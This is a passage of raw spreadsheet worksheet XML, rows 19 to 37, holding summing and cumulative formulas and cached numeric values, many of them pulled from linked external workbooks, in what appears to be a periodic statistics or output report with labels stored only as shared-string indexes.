        <f>J29+J39+J49+J59+J67+J74+J78</f>
        <v>0</v>
      </c>
      <c r="K19" s="194">
        <f>J19+'13'!K19</f>
        <v>0</v>
      </c>
      <c r="L19" s="194">
        <f>K19+yc!L19</f>
        <v>0</v>
      </c>
      <c r="M19" s="194"/>
      <c r="N19" s="195"/>
      <c r="O19" s="199"/>
      <c r="P19" s="213" t="s">
        <v>304</v>
      </c>
      <c r="Q19" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R19" s="209">
        <f>'[13]14'!$W$72</f>
        <v>1e-5</v>
      </c>
      <c r="S19" s="209">
        <f>'[13]14'!$X$72</f>
        <v>1e-5</v>
      </c>
      <c r="T19" s="209">
        <f>'[13]14'!$Y$72</f>
        <v>9.12676056338028e-6</v>
      </c>
      <c r="U19" s="209">
        <f>'[13]14'!$T$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V19" s="209">
        <f>'[13]14'!$U$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W19" s="209">
        <f>'[13]14'!$V$72</f>
        <v>4.25047892720306e-6</v>
      </c>
      <c r="X19" s="209">
        <f>'[13]14'!$Q$72</f>
        <v>1e-6</v>
      </c>
      <c r="Y19" s="209">
        <f>'[13]14'!$R$72</f>
        <v>1.4e-5</v>
      </c>
      <c r="Z19" s="209">
        <f>'[13]14'!$S$72</f>
        <v>0.000355</v>
      </c>
    </row>
    <row r="20" ht="15.75" customHeight="1" spans="1:26">
      <c r="A20" s="191"/>
      <c r="B20" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C20" s="193"/>
      <c r="D20" s="193"/>
      <c r="E20" s="194">
        <f>E30+E40+E50+E60</f>
        <v>0</v>
      </c>
      <c r="F20" s="194"/>
      <c r="G20" s="194">
        <f>G30+G40+G50+G60</f>
        <v>0</v>
      </c>
      <c r="H20" s="194">
        <f>G20+'13'!H20</f>
        <v>0</v>
      </c>
      <c r="I20" s="194">
        <f>H20+yc!I20</f>
        <v>0</v>
      </c>
      <c r="J20" s="194">
        <f>J30+J40+J50+J60</f>
        <v>0</v>
      </c>
      <c r="K20" s="194">
        <f>J20+'13'!K20</f>
        <v>0</v>
      </c>
      <c r="L20" s="194">
        <f>K20+yc!L20</f>
        <v>0</v>
      </c>
      <c r="M20" s="194"/>
      <c r="N20" s="195"/>
      <c r="O20" s="199"/>
      <c r="P20" s="215"/>
      <c r="Q20" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R20" s="209">
        <f>'[13]14'!$W$73</f>
        <v>1e-5</v>
      </c>
      <c r="S20" s="209">
        <f>'[13]14'!$X$73</f>
        <v>1e-5</v>
      </c>
      <c r="T20" s="209">
        <f>'[13]14'!$Y$73</f>
        <v>239.299857490501</v>
      </c>
      <c r="U20" s="209">
        <f>'[13]14'!$T$73</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V20" s="209">
        <f>'[13]14'!$U$73</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W20" s="209">
        <f>'[13]14'!$V$73</f>
        <v>69.2256986949234</v>
      </c>
      <c r="X20" s="209">
        <f>'[13]14'!$Q$73</f>
        <v>1e-6</v>
      </c>
      <c r="Y20" s="209">
        <f>'[13]14'!$R$73</f>
        <v>1.4e-5</v>
      </c>
      <c r="Z20" s="209">
        <f>'[13]14'!$S$73</f>
        <v>5781.730355</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" spans="1:26">
      <c r="A21" s="191" t="s">
        <v>229</v>
      </c>
      <c r="B21" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C21" s="193"/>
      <c r="D21" s="193"/>
      <c r="E21" s="194">
        <v>190000</v>
      </c>
      <c r="F21" s="194">
        <f>'[10]14'!$D$22</f>
        <v>83053.31</v>
      </c>
      <c r="G21" s="194">
        <f>'[10]14'!$E$22</f>
        <v>6726</v>
      </c>
      <c r="H21" s="194">
        <f>G21+'13'!H21</f>
        <v>94026</v>
      </c>
      <c r="I21" s="194">
        <f>H21+yc!I21</f>
        <v>2203464</v>
      </c>
      <c r="J21" s="194">
        <f>'[10]14'!$I$22</f>
        <v>8486.2</v>
      </c>
      <c r="K21" s="194">
        <f>J21+'13'!K21</f>
        <v>111160.96</v>
      </c>
      <c r="L21" s="194">
        <f>K21+yc!L21</f>
        <v>2177614.96</v>
      </c>
      <c r="M21" s="194">
        <f>'[10]14'!$L$22</f>
        <v>65918.35</v>
      </c>
      <c r="N21" s="195">
        <f>M21/47000*100</f>
        <v>140.251808510638</v>
      </c>
      <c r="O21" s="199"/>
      <c r="P21" s="215"/>
      <c r="Q21" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R21" s="209">
        <f>'[13]14'!$W$81</f>
        <v>274.026728646136</v>
      </c>
      <c r="S21" s="209">
        <f>'[13]14'!$X$81</f>
        <v>280.685889263544</v>
      </c>
      <c r="T21" s="209">
        <f>'[13]14'!$Y$81</f>
        <v>275.911317034765</v>
      </c>
      <c r="U21" s="209">
        <f>'[13]14'!$T$81</f>
        <v>37.8460648148148</v>
      </c>
      <c r="V21" s="209">
        <f>'[13]14'!$U$81</f>
        <v>41.6314484126984</v>
      </c>
      <c r="W21" s="209">
        <f>'[13]14'!$V$81</f>
        <v>36.3463242337165</v>
      </c>
      <c r="X21" s="209">
        <f>'[13]14'!$Q$81</f>
        <v>9.08305555555556</v>
      </c>
      <c r="Y21" s="209">
        <f>'[13]14'!$R$81</f>
        <v>139.881666666667</v>
      </c>
      <c r="Z21" s="209">
        <f>'[13]14'!$S$81</f>
        <v>3035.645</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" spans="1:26">
      <c r="A22" s="191"/>
      <c r="B22" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C22" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D22" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E22" s="194">
        <v>163000</v>
      </c>
      <c r="F22" s="194">
        <f>'[10]14'!$D$17</f>
        <v>189966.352</v>
      </c>
      <c r="G22" s="194">
        <f>'[10]14'!$E$17</f>
        <v>0</v>
      </c>
      <c r="H22" s="194">
        <f>G22+'13'!H22</f>
        <v>62660</v>
      </c>
      <c r="I22" s="194">
        <f>H22+yc!I22</f>
        <v>2093641</v>
      </c>
      <c r="J22" s="194">
        <f>'[10]14'!$I$17</f>
        <v>5658.11</v>
      </c>
      <c r="K22" s="194">
        <f>J22+'13'!K22</f>
        <v>91900.07</v>
      </c>
      <c r="L22" s="194">
        <f>K22+yc!L22</f>
        <v>1983361.45</v>
      </c>
      <c r="M22" s="194">
        <f>'[10]14'!$L$17</f>
        <v>160726.282</v>
      </c>
      <c r="N22" s="216">
        <f>(M22+M23)/(50000+150000)*100</f>
        <v>80.363141</v>
      </c>
      <c r="O22" s="199"/>
      <c r="P22" s="215"/>
      <c r="Q22" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R22" s="209">
        <f>'[13]14'!$W$79</f>
        <v>96.002335823256</v>
      </c>
      <c r="S22" s="209">
        <f>'[13]14'!$X$79</f>
        <v>100.453599871983</v>
      </c>
      <c r="T22" s="209">
        <f>'[13]14'!$Y$79</f>
        <v>102.174647533191</v>
      </c>
      <c r="U22" s="209">
        <f>'[13]14'!$T$79</f>
        <v>47.568287037037</v>
      </c>
      <c r="V22" s="209">
        <f>'[13]14'!$U$79</f>
        <v>53.7294973544973</v>
      </c>
      <c r="W22" s="209">
        <f>'[13]14'!$V$79</f>
        <v>45.7146791187739</v>
      </c>
      <c r="X22" s="209">
        <f>'[13]14'!$Q$79</f>
        <v>11.4163888888889</v>
      </c>
      <c r="Y22" s="209">
        <f>'[13]14'!$R$79</f>
        <v>180.531111111111</v>
      </c>
      <c r="Z22" s="209">
        <f>'[13]14'!$S$79</f>
        <v>3818.09</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" spans="1:26">
      <c r="A23" s="191"/>
      <c r="B23" s="193"/>
      <c r="C23" s="193"/>
      <c r="D23" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E23" s="194"/>
      <c r="F23" s="194">
        <f>'[10]14'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G23" s="194">
        <f>'[10]14'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H23" s="194">
        <f>G23+'13'!H23</f>
        <v>0</v>
      </c>
      <c r="I23" s="194">
        <f>H23+yc!I23</f>
        <v>0</v>
      </c>
      <c r="J23" s="194">
        <f>'[10]14'!$I$20</f>
        <v>0</v>
      </c>
      <c r="K23" s="194">
        <f>J23+'13'!K23</f>
        <v>0</v>
      </c>
      <c r="L23" s="194">
        <f>K23+yc!L23</f>
        <v>0</v>
      </c>
      <c r="M23" s="194">
        <f>'[10]14'!$L$21</f>
        <v>0</v>
      </c>
      <c r="N23" s="217"/>
      <c r="O23" s="199"/>
      <c r="P23" s="214"/>
      <c r="Q23" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R23" s="209">
        <f>'[13]14'!$W$80</f>
        <v>85.4261419814119</v>
      </c>
      <c r="S23" s="209">
        <f>'[13]14'!$X$80</f>
        <v>84.9593713861212</v>
      </c>
      <c r="T23" s="209">
        <f>'[13]14'!$Y$80</f>
        <v>79.4352759401655</v>
      </c>
      <c r="U23" s="209">
        <f>'[13]14'!$T$80</f>
        <v>40.9710648148148</v>
      </c>
      <c r="V23" s="209">
        <f>'[13]14'!$U$80</f>
        <v>43.1789021164021</v>
      </c>
      <c r="W23" s="209">
        <f>'[13]14'!$V$80</f>
        <v>32.9254902352065</v>
      </c>
      <c r="X23" s="209">
        <f>'[13]14'!$Q$80</f>
        <v>9.83305555555556</v>
      </c>
      <c r="Y23" s="209">
        <f>'[13]14'!$R$80</f>
        <v>145.081111111111</v>
      </c>
      <c r="Z23" s="209">
        <f>'[13]14'!$S$80</f>
        <v>2749.93694444445</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" spans="1:26">
      <c r="A24" s="191"/>
      <c r="B24" s="193"/>
      <c r="C24" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D24" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E24" s="194"/>
      <c r="F24" s="194">
        <f>'[10]14'!$D$21</f>
        <v>0</v>
      </c>
      <c r="G24" s="194">
        <f>'[10]14'!$E$56</f>
        <v>0</v>
      </c>
      <c r="H24" s="194">
        <f>G24+'13'!H24</f>
        <v>0</v>
      </c>
      <c r="I24" s="194">
        <f>H24+yc!I24</f>
        <v>0</v>
      </c>
      <c r="J24" s="194">
        <f>'[10]14'!$I$56</f>
        <v>720.11</v>
      </c>
      <c r="K24" s="194">
        <f>J24+'13'!K24</f>
        <v>23289.29</v>
      </c>
      <c r="L24" s="194">
        <f>K24+yc!L24</f>
        <v>303115.82</v>
      </c>
      <c r="M24" s="194">
        <f>'[10]14'!$L$20</f>
        <v>0</v>
      </c>
      <c r="N24" s="195"/>
      <c r="O24" s="199"/>
      <c r="P24" s="218" t="s">
        <v>262</v>
      </c>
      <c r="Q24" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R24" s="209">
        <f>'[14]14'!$R$6</f>
        <v>86.5230769230769</v>
      </c>
      <c r="S24" s="209">
        <f>'[14]14'!$S$6</f>
        <v>83.9305210918114</v>
      </c>
      <c r="T24" s="209">
        <f>'[14]14'!$T$6</f>
        <v>86.0586701612133</v>
      </c>
      <c r="U24" s="209">
        <f>'[14]14'!$O$6</f>
        <v>67.7083333333333</v>
      </c>
      <c r="V24" s="209">
        <f>'[14]14'!$P$6</f>
        <v>59.9702380952381</v>
      </c>
      <c r="W24" s="209">
        <f>'[14]14'!$Q$6</f>
        <v>52.6271551724138</v>
      </c>
      <c r="X24" s="209">
        <f>'[14]14'!$L$6</f>
        <v>16.25</v>
      </c>
      <c r="Y24" s="209">
        <f>'[14]14'!$M$6</f>
        <v>201.5</v>
      </c>
      <c r="Z24" s="209">
        <f>'[14]14'!$N$6</f>
        <v>4395.42</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" spans="1:26">
      <c r="A25" s="191"/>
      <c r="B25" s="193"/>
      <c r="C25" s="193"/>
      <c r="D25" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E25" s="194"/>
      <c r="F25" s="194"/>
      <c r="G25" s="194">
        <f>'[10]14'!$E$69</f>
        <v>0</v>
      </c>
      <c r="H25" s="194">
        <f>G25+'13'!H25</f>
        <v>0</v>
      </c>
      <c r="I25" s="194">
        <f>H25+yc!I25</f>
        <v>0</v>
      </c>
      <c r="J25" s="194">
        <f>'[10]14'!$I$69</f>
        <v>0</v>
      </c>
      <c r="K25" s="194">
        <f>J25+'13'!K25</f>
        <v>473.78</v>
      </c>
      <c r="L25" s="194">
        <f>K25+yc!L25</f>
        <v>79794.63</v>
      </c>
      <c r="M25" s="194"/>
      <c r="N25" s="195"/>
      <c r="O25" s="199"/>
      <c r="P25" s="219"/>
      <c r="Q25" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R25" s="209">
        <f>'[14]14'!$R$7</f>
        <v>194.153846153846</v>
      </c>
      <c r="S25" s="209">
        <f>'[14]14'!$S$7</f>
        <v>202.841791044776</v>
      </c>
      <c r="T25" s="209">
        <f>'[14]14'!$T$7</f>
        <v>188.181848556591</v>
      </c>
      <c r="U25" s="209">
        <f>'[14]14'!$O$7</f>
        <v>40.625</v>
      </c>
      <c r="V25" s="209">
        <f>'[14]14'!$P$7</f>
        <v>49.8511904761905</v>
      </c>
      <c r="W25" s="209">
        <f>'[14]14'!$Q$7</f>
        <v>50.1685823754789</v>
      </c>
      <c r="X25" s="209">
        <f>'[14]14'!$L$7</f>
        <v>9.75</v>
      </c>
      <c r="Y25" s="209">
        <f>'[14]14'!$M$7</f>
        <v>167.5</v>
      </c>
      <c r="Z25" s="209">
        <f>'[14]14'!$N$7</f>
        <v>4190.08</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" spans="1:26">
      <c r="A26" s="191"/>
      <c r="B26" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C26" s="193"/>
      <c r="D26" s="193"/>
      <c r="E26" s="194"/>
      <c r="F26" s="194"/>
      <c r="G26" s="194"/>
      <c r="H26" s="194">
        <f>G26+'13'!H26</f>
        <v>0</v>
      </c>
      <c r="I26" s="194">
        <f>H26+yc!I26</f>
        <v>0</v>
      </c>
      <c r="J26" s="194">
        <f>J27+J30</f>
        <v>0</v>
      </c>
      <c r="K26" s="194">
        <f>J26+'13'!K26</f>
        <v>0</v>
      </c>
      <c r="L26" s="194">
        <f>K26+yc!L26</f>
        <v>0</v>
      </c>
      <c r="M26" s="194"/>
      <c r="N26" s="195"/>
      <c r="O26" s="199"/>
      <c r="P26" s="191" t="s">
        <v>263</v>
      </c>
      <c r="Q26" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R26" s="209">
        <f>'[15]14'!$I$38</f>
        <v>0</v>
      </c>
      <c r="S26" s="209">
        <f>'[15]14'!$J$38</f>
        <v>0</v>
      </c>
      <c r="T26" s="209">
        <f>'[15]14'!$K$38</f>
        <v>0</v>
      </c>
      <c r="U26" s="209">
        <f>'[15]14'!$F$38</f>
        <v>0</v>
      </c>
      <c r="V26" s="209">
        <f>'[15]14'!$G$38</f>
        <v>0</v>
      </c>
      <c r="W26" s="209">
        <f>'[15]14'!$H$38</f>
        <v>0</v>
      </c>
      <c r="X26" s="209">
        <f>'[15]14'!$C$38</f>
        <v>0</v>
      </c>
      <c r="Y26" s="209">
        <f>'[15]14'!$D$38</f>
        <v>0</v>
      </c>
      <c r="Z26" s="209">
        <f>'[15]14'!$E$38</f>
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" spans="1:26">
      <c r="A27" s="191"/>
      <c r="B27" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C27" s="193"/>
      <c r="D27" s="193"/>
      <c r="E27" s="194">
        <v>190000</v>
      </c>
      <c r="F27" s="194"/>
      <c r="G27" s="194"/>
      <c r="H27" s="194">
        <f>G27+'13'!H27</f>
        <v>0</v>
      </c>
      <c r="I27" s="194">
        <f>H27+yc!I27</f>
        <v>0</v>
      </c>
      <c r="J27" s="194">
        <f>SUM(J28:J29)</f>
        <v>0</v>
      </c>
      <c r="K27" s="194">
        <f>J27+'13'!K27</f>
        <v>0</v>
      </c>
      <c r="L27" s="194">
        <f>K27+yc!L27</f>
        <v>0</v>
      </c>
      <c r="M27" s="194"/>
      <c r="N27" s="195"/>
      <c r="O27" s="220" t="s">
        <v>264</v>
      </c>
      <c r="P27" s="191" t="s">
        <v>237</v>
      </c>
      <c r="Q27" s="191"/>
      <c r="R27" s="209">
        <f>'[11]14'!$W$69</f>
        <v>23.8834192582737</v>
      </c>
      <c r="S27" s="209">
        <f>'[11]14'!$X$69</f>
        <v>22.7284741058475</v>
      </c>
      <c r="T27" s="209">
        <f>'[11]14'!$Y$69</f>
        <v>25.2659337183252</v>
      </c>
      <c r="U27" s="221">
        <f>'[11]14'!$T$69</f>
        <v>100</v>
      </c>
      <c r="V27" s="209">
        <f>'[11]14'!$U$69</f>
        <v>71.5238095238095</v>
      </c>
      <c r="W27" s="209">
        <f>'[11]14'!$V$69</f>
        <v>68.5009578544061</v>
      </c>
      <c r="X27" s="209" t="str">
        <f>'[11]14'!$Q$69</f>
        <v>24.00</v>
      </c>
      <c r="Y27" s="209" t="str">
        <f>'[11]14'!$R$69</f>
        <v>240.32</v>
      </c>
      <c r="Z27" s="209" t="str">
        <f>'[11]14'!$S$69</f>
        <v>5721.20</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" spans="1:26">
      <c r="A28" s="191"/>
      <c r="B28" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C28" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D28" s="193"/>
      <c r="E28" s="194"/>
      <c r="F28" s="194"/>
      <c r="G28" s="194"/>
      <c r="H28" s="194">
        <f>G28+'13'!H28</f>
        <v>0</v>
      </c>
      <c r="I28" s="194">
        <f>H28+yc!I28</f>
        <v>0</v>
      </c>
      <c r="J28" s="194"/>
      <c r="K28" s="194">
        <f>J28+'13'!K28</f>
        <v>0</v>
      </c>
      <c r="L28" s="194">
        <f>K28+yc!L28</f>
        <v>0</v>
      </c>
      <c r="M28" s="194"/>
      <c r="N28" s="195"/>
      <c r="O28" s="222"/>
      <c r="P28" s="223" t="s">
        <v>306</v>
      </c>
      <c r="Q28" s="224"/>
      <c r="R28" s="209">
        <f>'[10]14'!$W$104</f>
        <v>0</v>
      </c>
      <c r="S28" s="209">
        <f>'[10]14'!$X$104</f>
        <v>28.3179061602293</v>
      </c>
      <c r="T28" s="209">
        <f>'[10]14'!$Y$104</f>
        <v>26.0491177026315</v>
      </c>
      <c r="U28" s="209">
        <f>'[10]14'!$T$104</f>
        <v>0</v>
      </c>
      <c r="V28" s="209">
        <f>'[10]14'!$U$104</f>
        <v>68.7401785714286</v>
      </c>
      <c r="W28" s="209">
        <f>'[10]14'!$V$104</f>
        <v>64.5476173371647</v>
      </c>
      <c r="X28" s="209">
        <f>'[10]14'!$Q$104</f>
        <v>0</v>
      </c>
      <c r="Y28" s="209">
        <f>'[10]14'!$R$104</f>
        <v>230.967</v>
      </c>
      <c r="Z28" s="209">
        <f>'[10]14'!$S$104</f>
        <v>5391.017</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" spans="1:26">
      <c r="A29" s="191"/>
      <c r="B29" s="191"/>
      <c r="C29" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D29" s="193"/>
      <c r="E29" s="194"/>
      <c r="F29" s="194"/>
      <c r="G29" s="194"/>
      <c r="H29" s="194">
        <f>G29+'13'!H29</f>
        <v>0</v>
      </c>
      <c r="I29" s="194">
        <f>H29+yc!I29</f>
        <v>0</v>
      </c>
      <c r="J29" s="194"/>
      <c r="K29" s="194">
        <f>J29+'13'!K29</f>
        <v>0</v>
      </c>
      <c r="L29" s="194">
        <f>K29+yc!L29</f>
        <v>0</v>
      </c>
      <c r="M29" s="225"/>
      <c r="N29" s="195"/>
      <c r="O29" s="222"/>
      <c r="P29" s="223" t="s">
        <v>307</v>
      </c>
      <c r="Q29" s="224"/>
      <c r="R29" s="209">
        <f>'[10]14'!$W$105</f>
        <v>0</v>
      </c>
      <c r="S29" s="209">
        <f>'[10]14'!$X$105</f>
        <v>0</v>
      </c>
      <c r="T29" s="209">
        <f>'[10]14'!$Y$105</f>
        <v>29.9342377123697</v>
      </c>
      <c r="U29" s="209">
        <f>'[10]14'!$T$105</f>
        <v>0</v>
      </c>
      <c r="V29" s="209">
        <f>'[10]14'!$U$105</f>
        <v>0</v>
      </c>
      <c r="W29" s="209">
        <f>'[10]14'!$V$105</f>
        <v>33.5749760536399</v>
      </c>
      <c r="X29" s="209">
        <f>'[10]14'!$Q$105</f>
        <v>0</v>
      </c>
      <c r="Y29" s="209">
        <f>'[10]14'!$R$105</f>
        <v>0</v>
      </c>
      <c r="Z29" s="209">
        <f>'[10]14'!$S$105</f>
        <v>2804.182</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" spans="1:26">
      <c r="A30" s="191"/>
      <c r="B30" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C30" s="193"/>
      <c r="D30" s="193"/>
      <c r="E30" s="194"/>
      <c r="F30" s="194"/>
      <c r="G30" s="194"/>
      <c r="H30" s="194">
        <f>G30+'13'!H30</f>
        <v>0</v>
      </c>
      <c r="I30" s="194">
        <f>H30+yc!I30</f>
        <v>0</v>
      </c>
      <c r="J30" s="194"/>
      <c r="K30" s="194">
        <f>J30+'13'!K30</f>
        <v>0</v>
      </c>
      <c r="L30" s="194">
        <f>K30+yc!L30</f>
        <v>0</v>
      </c>
      <c r="M30" s="225"/>
      <c r="N30" s="195"/>
      <c r="O30" s="222"/>
      <c r="P30" s="223" t="s">
        <v>252</v>
      </c>
      <c r="Q30" s="224"/>
      <c r="R30" s="209">
        <f>'[12]14'!$W$72</f>
        <v>0</v>
      </c>
      <c r="S30" s="226">
        <f>'[12]14'!$X$72</f>
        <v>0</v>
      </c>
      <c r="T30" s="209">
        <f>'[12]14'!$Y$72</f>
        <v>0</v>
      </c>
      <c r="U30" s="209">
        <f>'[12]14'!$T$72</f>
        <v>0</v>
      </c>
      <c r="V30" s="209">
        <f>'[12]14'!$U$72</f>
        <v>0</v>
      </c>
      <c r="W30" s="209">
        <f>'[12]14'!$V$72</f>
        <v>0</v>
      </c>
      <c r="X30" s="209">
        <f>'[12]14'!$Q$72</f>
        <v>0</v>
      </c>
      <c r="Y30" s="209">
        <f>'[12]14'!$R$72</f>
        <v>0</v>
      </c>
      <c r="Z30" s="209">
        <f>'[12]14'!$S$72</f>
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" spans="1:26">
      <c r="A31" s="191" t="s">
        <v>237</v>
      </c>
      <c r="B31" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C31" s="193"/>
      <c r="D31" s="193"/>
      <c r="E31" s="194">
        <v>150000</v>
      </c>
      <c r="F31" s="194">
        <f>'[11]14'!$D$16</f>
        <v>65429.37</v>
      </c>
      <c r="G31" s="194">
        <f>'[11]14'!$E$16</f>
        <v>4795</v>
      </c>
      <c r="H31" s="194">
        <f>G31+'13'!H31</f>
        <v>67972</v>
      </c>
      <c r="I31" s="194">
        <f>H31+yc!I31</f>
        <v>1440979</v>
      </c>
      <c r="J31" s="194">
        <f>'[11]14'!$I$16</f>
        <v>3712.38</v>
      </c>
      <c r="K31" s="194">
        <f>J31+'13'!K31</f>
        <v>66548.01</v>
      </c>
      <c r="L31" s="194">
        <f>K31+yc!L31</f>
        <v>1422596.14</v>
      </c>
      <c r="M31" s="225">
        <f>'[11]14'!$L$16</f>
        <v>66853.36</v>
      </c>
      <c r="N31" s="195">
        <f>M31/75000*100</f>
        <v>89.1378133333333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'[11]14'!$D$13</f>
        <v>60437.506</v>
      </c>
      <c r="G32" s="194">
        <f>'[11]14'!$E$13</f>
        <v>6013</v>
      </c>
      <c r="H32" s="194">
        <f>G32+'13'!H32</f>
        <v>65591</v>
      </c>
      <c r="I32" s="194">
        <f>H32+yc!I32</f>
        <v>1593434</v>
      </c>
      <c r="J32" s="194">
        <f>'[11]14'!$I$13</f>
        <v>3451</v>
      </c>
      <c r="K32" s="194">
        <f>J32+'13'!K32</f>
        <v>50189</v>
      </c>
      <c r="L32" s="194">
        <f>K32+yc!L32</f>
        <v>1071667</v>
      </c>
      <c r="M32" s="225">
        <f>'[11]14'!$L$13</f>
        <v>70502.466</v>
      </c>
      <c r="N32" s="207">
        <f>(M32+M33)/50000*100</f>
        <v>141.004932</v>
      </c>
      <c r="O32" s="222"/>
      <c r="P32" s="223" t="s">
        <v>308</v>
      </c>
      <c r="Q32" s="224"/>
      <c r="R32" s="209">
        <f>'[13]14'!$W$76</f>
        <v>0</v>
      </c>
      <c r="S32" s="209">
        <f>'[13]14'!$X$76</f>
        <v>0</v>
      </c>
      <c r="T32" s="209">
        <f>'[13]14'!$Y$76</f>
        <v>0</v>
      </c>
      <c r="U32" s="209">
        <f>'[13]14'!$T$76</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V32" s="209">
        <f>'[13]14'!$U$76</f>
        <v>3.86904761904762e-11</v>
      </c>
      <c r="W32" s="209">
        <f>'[13]14'!$V$76</f>
        <v>4.10680076628353e-11</v>
      </c>
      <c r="X32" s="209">
        <f>'[13]14'!$Q$76</f>
        <v>1e-11</v>
      </c>
      <c r="Y32" s="209">
        <f>'[13]14'!$R$76</f>
        <v>1.3e-10</v>
      </c>
      <c r="Z32" s="209">
        <f>'[13]14'!$S$76</f>
        <v>3.43e-9</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" spans="1:26">
      <c r="A33" s="191"/>
      <c r="B33" s="193"/>
      <c r="C33" s="193"/>
      <c r="D33" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E33" s="194"/>
      <c r="F33" s="194"/>
      <c r="G33" s="194">
        <f>'[11]14'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H33" s="194">
        <f>G33+'13'!H33</f>
        <v>0</v>
      </c>
      <c r="I33" s="194">
        <f>H33+yc!I33</f>
        <v>0</v>
      </c>
      <c r="J33" s="194">
        <f>'[11]14'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K33" s="194">
        <f>J33+'13'!K33</f>
        <v>0</v>
      </c>
      <c r="L33" s="194">
        <f>K33+yc!L33</f>
        <v>0</v>
      </c>
      <c r="M33" s="225">
        <f>'[11]14'!$L$14</f>
        <v>0</v>
      </c>
      <c r="N33" s="212"/>
      <c r="O33" s="222"/>
      <c r="P33" s="223" t="s">
        <v>309</v>
      </c>
      <c r="Q33" s="224"/>
      <c r="R33" s="209">
        <f>'[13]14'!$W$77</f>
        <v>0</v>
      </c>
      <c r="S33" s="209">
        <f>'[13]14'!$X$77</f>
        <v>0</v>
      </c>
      <c r="T33" s="209">
        <f>'[13]14'!$Y$77</f>
        <v>19.77</v>
      </c>
      <c r="U33" s="209">
        <f>'[13]14'!$T$77</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V33" s="209">
        <f>'[13]14'!$U$77</f>
        <v>2.97619047619048e-12</v>
      </c>
      <c r="W33" s="209">
        <f>'[13]14'!$V$77</f>
        <v>60.5821360153271</v>
      </c>
      <c r="X33" s="209">
        <f>'[13]14'!$Q$77</f>
        <v>1e-11</v>
      </c>
      <c r="Y33" s="209">
        <f>'[13]14'!$R$77</f>
        <v>1e-11</v>
      </c>
      <c r="Z33" s="209">
        <f>'[13]14'!$S$77</f>
        <v>5059.82000000012</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" spans="1:26">
      <c r="A34" s="191"/>
      <c r="B34" s="193"/>
      <c r="C34" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D34" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E34" s="194"/>
      <c r="F34" s="194"/>
      <c r="G34" s="194">
        <f>'[11]14'!$E$50</f>
        <v>0</v>
      </c>
      <c r="H34" s="194">
        <f>G34+'13'!H34</f>
        <v>0</v>
      </c>
      <c r="I34" s="194">
        <f>H34+yc!I34</f>
        <v>0</v>
      </c>
      <c r="J34" s="194">
        <f>'[11]14'!$I$50</f>
        <v>2395.41</v>
      </c>
      <c r="K34" s="194">
        <f>J34+'13'!K34</f>
        <v>5337.04</v>
      </c>
      <c r="L34" s="194">
        <f>K34+yc!L34</f>
        <v>472539.97</v>
      </c>
      <c r="M34" s="225">
        <f>'[11]14'!$L$15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'[11]14'!$E$64</f>
        <v>0</v>
      </c>
      <c r="H35" s="194">
        <f>G35+'13'!H35</f>
        <v>0</v>
      </c>
      <c r="I35" s="194">
        <f>H35+yc!I35</f>
        <v>0</v>
      </c>
      <c r="J35" s="194">
        <f>'[11]14'!$I$64</f>
        <v>0</v>
      </c>
      <c r="K35" s="194">
        <f>J35+'13'!K35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G36+'13'!H36</f>
        <v>0</v>
      </c>
      <c r="I36" s="194">
        <f>H36+yc!I36</f>
        <v>0</v>
      </c>
      <c r="J36" s="194">
        <f>J37+J40</f>
        <v>0</v>
      </c>
      <c r="K36" s="194">
        <f>J36+'13'!K36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G37+'13'!H37</f>
        <v>0</v>
      </c>
      <c r="I37" s="194">
        <f>H37+yc!I37</f>
        <v>0</v>
      </c>
      <c r="J37" s="194">
        <f>SUM(J38:J39)</f>
        <v>0</v>
      </c>
      <c r="K37" s="194">
        <f>J37+'13'!K37</f>
        <v>0</v>
      </c>
      <c r="L37" s="194">
        <f>K37+yc!L37</f>
        <v>0</v>
      </c>
      <c r="M37" s="225"/>
      <c r="N37" s="195"/>
      <c r="O37" s="197" t="s">
        <v>268</v>
      </c>
